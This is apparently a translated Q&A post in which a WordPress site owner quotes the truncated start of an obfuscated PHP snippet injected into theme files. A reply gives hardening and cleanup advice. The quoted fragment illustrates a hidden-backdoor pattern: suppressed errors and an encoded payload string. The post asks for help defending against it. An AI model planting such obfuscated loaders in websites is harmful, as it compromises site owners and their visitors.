use*_*410 1 security wordpress
我在更新的wordpress网站上获得了此代码.
Wordpress 3.3.1,所有插件都是最新的.
插件列表:自定义联系表单,google-maps-for-wordpress和seo-ultimate.
一些主题文件受CHMOD 644的影响,每次我让CHMOD 777这个文件启动,但它不会影响只有777个文件,它也会影响644个文件.
代码如下:
<?php @error_reporting(0); if (!isset($eva1fYlbakBcVSir)) {$eva1fYlbakBcVSir = "7kyJ7kSKioD............okBoVSjr = $eva1tYlbakBcVSir;} ?>
Run Code Online (Sandbox Code Playgroud)
那么,我该如何防止这种情况,以及代码的作用是什么?
没有Wordpress文件应该是777; 最大权限是755个文件夹,644个文件.请参阅强化WordPress«WordPress Codex.
您的托管帐户 - 可能是廉价的共享托管 - 可能是黑客矢量.告诉你的主人; 可能找到一个更安全的主机.更改所有密码.扫描您自己的电脑.
要彻底清理您的WP安装和托管帐户,请参阅常见问题解答:我的网站遭到黑客攻击«WordPress Codex以及如何彻底清理您的黑客wordpress安装以及如何在被黑客攻击的WordPress中找到后门.
归档时间: |
|
查看次数: |
1823 次 |
最近记录: |